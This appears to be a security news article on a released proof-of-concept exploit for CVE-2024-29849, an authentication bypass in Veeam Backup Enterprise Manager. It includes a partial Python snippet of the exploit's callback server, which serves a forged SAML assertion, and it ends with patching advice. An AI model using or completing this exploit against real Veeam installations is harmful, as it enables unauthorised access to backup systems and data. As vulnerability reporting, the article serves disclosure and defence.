PoC Exploit Released For Veeam Authentication Bypass Vulnerability

A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.

This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software. 

CVE-2024-29849: The Vulnerability

On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.

This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.

The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.

This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443. 

Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN : Start your Analysis

Technical Analysis of the Exploit

The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.

This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.

The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.

The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.

The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.

Proof of Concept (PoC) Code

The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.

Below is a snippet of the PoC code:

from http.server import HTTPServer, SimpleHTTPRequestHandler

import ssl

import warnings

import base64

import requests

from urllib.parse import urlparse

from threading import Thread

import os

warnings.filterwarnings("ignore", category=DeprecationWarning)

requests.packages.urllib3.disable_warnings()

class CustomHandler(SimpleHTTPRequestHandler):

    def do_POST(self):

        xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">

                            <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>

                            <saml2:Status>

                                <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>

                            </saml2:Status>

                          </saml2:Assertion>'''

        self.send_response(200)

        self.send_header("Content-type", "text/xml")

        self.end_headers()

        self.wfile.write(xml_response.encode("utf-8"))

        print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")

def start_callback_server(ip, port):

    httpd = HTTPServer((ip, port), CustomHandler)

    ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)

    ssl_context.load_cert_chain("server.pem", keyfile="key.pem")

    httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)

    print(f"(*) Callback server listening on https://{ip}:{port}")

    httpd.serve_forever()

# Additional code for exploit execution...

Implications and Mitigation

The release of this PoC exploit underscores the critical nature of CVE-2024-29849.

Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.

An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.

Veeam has recommended immediate updates to their software’s latest version, including patches to address this vulnerability.

Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation. 

The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.

It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo